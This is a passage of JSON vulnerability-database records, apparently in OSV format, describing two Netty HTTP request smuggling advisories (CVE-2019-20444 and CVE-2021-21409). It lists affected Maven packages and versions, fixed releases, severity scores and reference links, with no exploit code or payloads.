"2020-02-21T18:55:24Z", "modified": "2025-07-02T16:20:12.563640Z", "aliases": [ "CVE-2019-20444" ], "related": [ "CGA-gg6m-vh7x-6jr4" ], "summary": "HTTP Request Smuggling in Netty", "details": "HttpObjectDecoder.java in Netty before 4.1.44 allows an HTTP header that lacks a colon, which might be interpreted as a separate header with an incorrect syntax, or might be interpreted as an \"invalid fold.\"", "affected": [ { "package": { "name": "io.netty:netty-codec-http", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty-codec-http" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "4.1.44" } ] } ], "versions": [ "4.0.0.Alpha1", "4.0.0.Alpha2", "4.0.0.Alpha3", "4.0.0.Alpha4", "4.0.0.Alpha5", "4.0.0.Alpha6", "4.0.0.Alpha7", "4.0.0.Alpha8", "4.0.0.Beta1", "4.0.0.Beta2", "4.0.0.Beta3", "4.0.0.CR1", "4.0.0.CR2", "4.0.0.CR3", "4.0.0.CR4", "4.0.0.CR5", "4.0.0.CR6", "4.0.0.CR7", "4.0.0.CR8", "4.0.0.CR9", "4.0.0.Final", "4.0.1.Final", "4.0.10.Final", "4.0.11.Final", "4.0.12.Final", "4.0.13.Final", "4.0.14.Beta1", "4.0.14.Final", "4.0.15.Final", "4.0.16.Final", "4.0.17.Final", "4.0.18.Final", 
"4.0.19.Final", "4.0.2.Final", "4.0.20.Final", "4.0.21.Final", "4.0.22.Final", "4.0.23.Final", "4.0.24.Final", "4.0.25.Final", "4.0.26.Final", "4.0.27.Final", "4.0.28.Final", "4.0.29.Final", "4.0.3.Final", "4.0.30.Final", "4.0.31.Final", "4.0.32.Final", "4.0.33.Final", "4.0.34.Final", "4.0.35.Final", "4.0.36.Final", "4.0.37.Final", "4.0.38.Final", "4.0.39.Final", "4.0.4.Final", "4.0.40.Final", "4.0.41.Final", "4.0.42.Final", "4.0.43.Final", "4.0.44.Final", "4.0.45.Final", "4.0.46.Final", "4.0.47.Final", "4.0.48.Final", "4.0.49.Final", "4.0.5.Final", "4.0.50.Final", "4.0.51.Final", "4.0.52.Final", "4.0.53.Final", "4.0.54.Final", "4.0.55.Final", "4.0.56.Final", "4.0.6.Final", "4.0.7.Final", "4.0.8.Final", "4.0.9.Final", "4.1.0.Beta1", "4.1.0.Beta2", "4.1.0.Beta3", "4.1.0.Beta4", "4.1.0.Beta5", "4.1.0.Beta6", "4.1.0.Beta7", "4.1.0.Beta8", "4.1.0.CR1", "4.1.0.CR2", "4.1.0.CR3", "4.1.0.CR4", "4.1.0.CR5", "4.1.0.CR6", "4.1.0.CR7", "4.1.0.Final", "4.1.1.Final", "4.1.10.Final", "4.1.11.Final", "4.1.12.Final", "4.1.13.Final", "4.1.14.Final", "4.1.15.Final", "4.1.16.Final", "4.1.17.Final", "4.1.18.Final", "4.1.19.Final", "4.1.2.Final", "4.1.20.Final", "4.1.21.Final", "4.1.22.Final", "4.1.23.Final", "4.1.24.Final", "4.1.25.Final", "4.1.26.Final", "4.1.27.Final", "4.1.28.Final", "4.1.29.Final", "4.1.3.Final", "4.1.30.Final", "4.1.31.Final", "4.1.32.Final", "4.1.33.Final", "4.1.34.Final", "4.1.35.Final", "4.1.36.Final", "4.1.37.Final", "4.1.38.Final", "4.1.39.Final", "4.1.4.Final", "4.1.40.Final", "4.1.41.Final", "4.1.42.Final", "4.1.43.Final", "4.1.5.Final", "4.1.6.Final", "4.1.7.Final", "4.1.8.Final", "4.1.9.Final" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/02/GHSA-cqqj-4p63-rrmm/GHSA-cqqj-4p63-rrmm.json" } }, { "package": { "name": "org.jboss.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/org.jboss.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" } ] } ], 
"versions": [ "3.0.0.CR1", "3.0.0.CR2", "3.0.0.CR3", "3.0.0.CR4", "3.0.0.CR5", "3.0.0.GA", "3.0.1.GA", "3.0.2.GA", "3.1.0.ALPHA1", "3.1.0.ALPHA2", "3.1.0.ALPHA3", "3.1.0.ALPHA4", "3.1.0.BETA1", "3.1.0.BETA2", "3.1.0.BETA3", "3.1.0.CR1", "3.1.0.GA", "3.1.1.GA", "3.1.2.GA", "3.1.3.GA", "3.1.4.GA", "3.1.5.GA", "3.2.0.ALPHA1", "3.2.0.ALPHA2", "3.2.0.ALPHA3", "3.2.0.ALPHA4", "3.2.0.BETA1", "3.2.0.CR1", "3.2.0.Final", "3.2.1.Final", "3.2.10.Final", "3.2.2.Final", "3.2.3.Final", "3.2.4.Final", "3.2.5.Final", "3.2.6.Final", "3.2.7.Final", "3.2.8.Final", "3.2.9.Final" ], "database_specific": { "last_known_affected_version_range": "\u003c 4.0.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/02/GHSA-cqqj-4p63-rrmm/GHSA-cqqj-4p63-rrmm.json" } }, { "package": { "name": "io.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" } ] } ], "versions": [ "3.10.0.Final", "3.10.1.Final", "3.10.2.Final", "3.10.3.Final", "3.10.4.Final", "3.10.5.Final", "3.10.6.Final", "3.3.0.Final", "3.3.1.Final", "3.4.0.Alpha1", "3.4.0.Alpha2", "3.4.0.Beta1", "3.4.0.Final", "3.4.1.Final", "3.4.2.Final", "3.4.3.Final", "3.4.4.Final", "3.4.5.Final", "3.4.6.Final", "3.5.0.Beta1", "3.5.0.Final", "3.5.1.Final", "3.5.10.Final", "3.5.11.Final", "3.5.12.Final", "3.5.13.Final", "3.5.2.Final", "3.5.3.Final", "3.5.4.Final", "3.5.5.Final", "3.5.6.Final", "3.5.7.Final", "3.5.8.Final", "3.5.9.Final", "3.6.0.Beta1", "3.6.0.Final", "3.6.1.Final", "3.6.10.Final", "3.6.2.Final", "3.6.3.Final", "3.6.4.Final", "3.6.5.Final", "3.6.6.Final", "3.6.7.Final", "3.6.8.Final", "3.6.9.Final", "3.7.0.Final", "3.7.1.Final", "3.8.0.Final", "3.8.1.Final", "3.8.2.Final", "3.8.3.Final", "3.9.0.Final", "3.9.1.1.Final", "3.9.1.Final", "3.9.2.Final", "3.9.3.Final", "3.9.4.Final", "3.9.5.Final", "3.9.6.Final", "3.9.7.Final", "3.9.8.Final", "3.9.9.Final", "4.0.0.Alpha1", "4.0.0.Alpha2", "4.0.0.Alpha3", 
"4.0.0.Alpha4", "4.0.0.Alpha5", "4.0.0.Alpha6", "4.0.0.Alpha7", "4.0.0.Alpha8" ], "database_specific": { "last_known_affected_version_range": "\u003c 4.0.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/02/GHSA-cqqj-4p63-rrmm/GHSA-cqqj-4p63-rrmm.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-20444" }, { "type": "WEB", "url": "https://github.com/netty/netty/issues/9866" }, { "type": "WEB", "url": "https://github.com/netty/netty/pull/9871/files#diff-e26989b9171ef22c27c9f7d80689cfb059d568c9bd10e75970d96c02d0654878" }, { "type": "WEB", "url": "https://github.com/netty/netty/pull/9871" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra9fbfe7d4830ae675bf34c7c0f8c22fc8a4099f65706c1bc4f54c593%40%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra9fbfe7d4830ae675bf34c7c0f8c22fc8a4099f65706c1bc4f54c593@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raaac04b7567c554786132144bea3dcb72568edd410c1e6f0101742e7%40%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raaac04b7567c554786132144bea3dcb72568edd410c1e6f0101742e7@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb3361f6c6a5f834ad3db5e998c352760d393c0891b8d3bea90baa836%40%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb3361f6c6a5f834ad3db5e998c352760d393c0891b8d3bea90baa836@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb84c57670ec48ef23f4d07973b7fa69f629b8e7fcfb48874362feb6f%40%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb84c57670ec48ef23f4d07973b7fa69f629b8e7fcfb48874362feb6f@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/rc7eb5634b71d284483e58665b22bf274a69bd184d9bd7ede52015d91%40%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc7eb5634b71d284483e58665b22bf274a69bd184d9bd7ede52015d91@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcb2c59428f34d4757702f9ae739a8795bda7bea97b857e708a9c62c6%40%3Ccommon-commits.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcb2c59428f34d4757702f9ae739a8795bda7bea97b857e708a9c62c6@%3Ccommon-commits.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rce71d33747010d32d31d90f5d737dae26291d96552f513a266c92fbb%40%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rce71d33747010d32d31d90f5d737dae26291d96552f513a266c92fbb@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd0e44e8ef71eeaaa3cf3d1b8b41eb25894372e2995ec908ce7624d26%40%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra2ace4bcb5cf487f72cbcbfa0f8cc08e755ec2b93d7e69f276148b08@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra2ace4bcb5cf487f72cbcbfa0f8cc08e755ec2b93d7e69f276148b08%40%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra1a71b576a45426af5ee65255be9596ff3181a342f4ba73b800db78f@%3Cdev.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra1a71b576a45426af5ee65255be9596ff3181a342f4ba73b800db78f%40%3Cdev.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9b20cdac704cf9a583400350e2d5b576fa8417c18ddb961201676c60@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r9b20cdac704cf9a583400350e2d5b576fa8417c18ddb961201676c60%40%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r96e08f929234e8ba1ef4a93a0fd2870f535a1f9ab628fabc46115986@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r96e08f929234e8ba1ef4a93a0fd2870f535a1f9ab628fabc46115986%40%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r959474dcf7f88565ed89f6252ca5a274419006cb71348f14764b183d@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r959474dcf7f88565ed89f6252ca5a274419006cb71348f14764b183d%40%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r91e0fa345c86c128b75a4a791b4b503b53173ff4c13049ac7129d319@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r91e0fa345c86c128b75a4a791b4b503b53173ff4c13049ac7129d319%40%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r90030b0117490caed526e57271bf4d7f9b012091ac5083c895d16543@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r90030b0117490caed526e57271bf4d7f9b012091ac5083c895d16543%40%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://www.debian.org/security/2021/dsa-4885" }, { "type": "WEB", "url": "https://usn.ubuntu.com/4532-1" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TS6VX7OMXPDJIU5LRGUAHRK6MENAVJ46" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TS6VX7OMXPDJIU5LRGUAHRK6MENAVJ46" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/09/msg00004.html" }, { "type": "WEB", "url": 
"https://lists.debian.org/debian-lts-announce/2020/09/msg00003.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/02/msg00018.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/02/msg00017.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rff210a24f3a924829790e69eaefa84820902b7b31f17c3bf2def9114@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rff210a24f3a924829790e69eaefa84820902b7b31f17c3bf2def9114%40%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfb55f245b08d8a6ec0fb4dc159022227cd22de34c4419c2fbb18802b@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfb55f245b08d8a6ec0fb4dc159022227cd22de34c4419c2fbb18802b%40%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf5b2dfb7401666a19915f8eaef3ba9f5c3386e2066fcd2ae66e16a2f@%3Cdev.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf5b2dfb7401666a19915f8eaef3ba9f5c3386e2066fcd2ae66e16a2f%40%3Cdev.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf2bf8e2eb0a03227f5bc100b544113f8cafea01e887bb068e8d1fa41@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf2bf8e2eb0a03227f5bc100b544113f8cafea01e887bb068e8d1fa41%40%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re78eaef7d01ad65c370df30e45c686fffff00b37f7bfd78b26a08762@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re78eaef7d01ad65c370df30e45c686fffff00b37f7bfd78b26a08762%40%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/re45ee9256d3233c31d78e59ee59c7dc841c7fbd83d0769285b41e948@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re45ee9256d3233c31d78e59ee59c7dc841c7fbd83d0769285b41e948%40%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re0b78a3d0a4ba2cf9f4e14e1d05040bde9051d5c78071177186336c9@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re0b78a3d0a4ba2cf9f4e14e1d05040bde9051d5c78071177186336c9%40%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdd5d243a5f8ed8b83c0104e321aa420e5e98792a95749e3c9a54c0b9@%3Ccommon-commits.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdd5d243a5f8ed8b83c0104e321aa420e5e98792a95749e3c9a54c0b9%40%3Ccommon-commits.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdb69125652311d0c41f6066ff44072a3642cf33a4b5e3c4f9c1ec9c2@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdb69125652311d0c41f6066ff44072a3642cf33a4b5e3c4f9c1ec9c2%40%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd8f72411fb75b98d366400ae789966373b5c3eb3f511e717caf3e49e@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd8f72411fb75b98d366400ae789966373b5c3eb3f511e717caf3e49e%40%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd0e44e8ef71eeaaa3cf3d1b8b41eb25894372e2995ec908ce7624d26@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r310d2ce22304d5298ff87f10134f918c87919b452734f9841d95682d%40%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r2f2989b7815d809ff3fda8ce330f553e5f133505afd04ffbc135f35f@%3Cissues.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2f2989b7815d809ff3fda8ce330f553e5f133505afd04ffbc135f35f%40%3Cissues.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r205937c85817a911b0c72655c2377e7a2c9322d6ef6ce1b118d34d8d@%3Cdev.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r205937c85817a911b0c72655c2377e7a2c9322d6ef6ce1b118d34d8d%40%3Cdev.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1fcccf8bdb3531c28bc9aa605a6a1bea7e68cef6fc12e01faafb2fb5@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1fcccf8bdb3531c28bc9aa605a6a1bea7e68cef6fc12e01faafb2fb5%40%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3Cissues.bookkeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0%40%3Cissues.bookkeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0f5e72d5f69b4720dfe64fcbc2da9afae949ed1e9cbffa84bb7d92d7@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0f5e72d5f69b4720dfe64fcbc2da9afae949ed1e9cbffa84bb7d92d7%40%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0c3d49bfdbc62fd3915676433cc5899c5506d06da1c552ef1b7923a5@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0c3d49bfdbc62fd3915676433cc5899c5506d06da1c552ef1b7923a5%40%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r0aa8b28e76ec01c697b15e161e6797e88fc8d406ed762e253401106e@%3Ccommits.camel.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0aa8b28e76ec01c697b15e161e6797e88fc8d406ed762e253401106e%40%3Ccommits.camel.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r059b042bca47be53ff8a51fd04d95eb01bb683f1afa209db136e8cb7@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r059b042bca47be53ff8a51fd04d95eb01bb683f1afa209db136e8cb7%40%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://github.com/poc-effectiveness/PoCAdaptation/tree/main/Adapted/CVE-2019-20444/5.0.0.Alpha1/exploit" }, { "type": "WEB", "url": "https://github.com/netty/netty/compare/netty-4.1.43.Final...netty-4.1.44.Final" }, { "type": "PACKAGE", "url": "https://github.com/netty/netty" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0811" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0806" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0805" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0804" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0606" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0605" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0601" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0567" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0497" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r86befa74c5cd1482c711134104aec339bf7ae879f2c4437d7ec477d4@%3Ccommon-commits.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r86befa74c5cd1482c711134104aec339bf7ae879f2c4437d7ec477d4%40%3Ccommon-commits.hadoop.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r8402d67fdfe9cf169f859d52a7670b28a08eff31e54b522cc1432532@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8402d67fdfe9cf169f859d52a7670b28a08eff31e54b522cc1432532%40%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r832724df393a7ef25ca4c7c2eb83ad2d6c21c74569acda5233f9f1ec@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r832724df393a7ef25ca4c7c2eb83ad2d6c21c74569acda5233f9f1ec%40%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r819aaeb9944bdcfca438dcc51f05650dc728daf64dfd7d774fc2499b@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r819aaeb9944bdcfca438dcc51f05650dc728daf64dfd7d774fc2499b%40%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r804895eedd72c9ec67898286eb185e04df852b0dd5fe53cf5b6138f9@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r804895eedd72c9ec67898286eb185e04df852b0dd5fe53cf5b6138f9%40%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7790b9d99696d9eddce8a8c96f13bb68460984294ea6fea3800143e4@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7790b9d99696d9eddce8a8c96f13bb68460984294ea6fea3800143e4%40%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r70b1ff22ee80e8101805b9a473116dd33265709007d2deb6f8c80bf2@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r70b1ff22ee80e8101805b9a473116dd33265709007d2deb6f8c80bf2%40%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r6945f3c346b7af89bbd3526a7c9b705b1e3569070ebcd0964bcedd7d@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6945f3c346b7af89bbd3526a7c9b705b1e3569070ebcd0964bcedd7d%40%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r640eb9b3213058a963e18291f903fc1584e577f60035f941e32f760a@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r640eb9b3213058a963e18291f903fc1584e577f60035f941e32f760a%40%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4d3f1d3e333d9c2b2f6e6ae8ed8750d4de03410ac294bcd12c7eefa3@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4d3f1d3e333d9c2b2f6e6ae8ed8750d4de03410ac294bcd12c7eefa3%40%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4c675b2d0cc2a5e506b11ee10d60a378859ee340aca052e4c7ef4749@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4c675b2d0cc2a5e506b11ee10d60a378859ee340aca052e4c7ef4749%40%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r489886fe72a98768eed665474cba13bad8d6fe0654f24987706636c5@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r489886fe72a98768eed665474cba13bad8d6fe0654f24987706636c5%40%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r36fcf538b28f2029e8b4f6b9a772f3b107913a78f09b095c5b153a62@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r36fcf538b28f2029e8b4f6b9a772f3b107913a78f09b095c5b153a62%40%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r34912a9b1a5c269a77b8be94ef6fb6d1e9b3c69129719dc00f01cf0b@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r34912a9b1a5c269a77b8be94ef6fb6d1e9b3c69129719dc00f01cf0b%40%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r310d2ce22304d5298ff87f10134f918c87919b452734f9841d95682d@%3Ccommits.zookeeper.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-444" ], "github_reviewed": true, "github_reviewed_at": "2020-02-20T20:54:33Z", "nvd_published_at": "2020-01-29T21:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-f256-j965-7f32", "published": "2021-03-30T15:10:38Z", "modified": "2025-01-14T08:57:35.768526Z", "aliases": [ "CVE-2021-21409" ], "related": [ "CGA-494w-f4g6-835m", "CGA-c2w9-39fx-cvc6", "CVE-2021-21409" ], "summary": "Possible request smuggling in HTTP/2 due missing validation of content-length", "details": "### Impact\nThe content-length header is not correctly validated if the request only uses a single Http2HeaderFrame with the endStream set to true. This could lead to request smuggling if the request is proxied to a remote peer and translated to HTTP/1.1\n\nThis is a followup of https://github.com/netty/netty/security/advisories/GHSA-wm47-8v5p-wjpj which missed this one case. 
\n\n### Patches\nThis was fixed as part of 4.1.61.Final\n\n### Workarounds\nValidation can be done by the user before proxying the request, by validating the header.", "affected": [ { "package": { "name": "io.netty:netty-codec-http2", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty-codec-http2" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "4.0.0" }, { "fixed": "4.1.61.Final" } ] } ], "versions": [ "4.1.0.Beta4", "4.1.0.Beta5", "4.1.0.Beta6", "4.1.0.Beta7", "4.1.0.Beta8", "4.1.0.CR1", "4.1.0.CR2", "4.1.0.CR3", "4.1.0.CR4", "4.1.0.CR5", "4.1.0.CR6", "4.1.0.CR7", "4.1.0.Final", "4.1.1.Final", "4.1.10.Final", "4.1.11.Final", "4.1.12.Final", "4.1.13.Final", "4.1.14.Final", "4.1.15.Final", "4.1.16.Final", "4.1.17.Final", "4.1.18.Final", "4.1.19.Final", "4.1.2.Final", "4.1.20.Final", "4.1.21.Final", "4.1.22.Final", "4.1.23.Final", "4.1.24.Final", "4.1.25.Final", "4.1.26.Final", "4.1.27.Final", "4.1.28.Final", "4.1.29.Final", "4.1.3.Final", "4.1.30.Final", "4.1.31.Final", "4.1.32.Final", "4.1.33.Final", "4.1.34.Final", "4.1.35.Final", "4.1.36.Final", "4.1.37.Final", "4.1.38.Final", "4.1.39.Final", "4.1.4.Final", "4.1.40.Final", "4.1.41.Final", "4.1.42.Final", "4.1.43.Final", "4.1.44.Final", "4.1.45.Final", "4.1.46.Final", "4.1.47.Final", "4.1.48.Final", "4.1.49.Final", "4.1.5.Final", "4.1.50.Final", "4.1.51.Final", "4.1.52.Final", "4.1.53.Final", "4.1.54.Final", "4.1.55.Final", "4.1.56.Final", "4.1.57.Final", "4.1.58.Final", "4.1.59.Final", "4.1.6.Final", "4.1.60.Final", "4.1.7.Final", "4.1.8.Final", "4.1.9.Final" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/03/GHSA-f256-j965-7f32/GHSA-f256-j965-7f32.json" } }, { "package": { "name": "org.jboss.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/org.jboss.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" } ] } ], "versions": [ "3.0.0.CR1", "3.0.0.CR2", 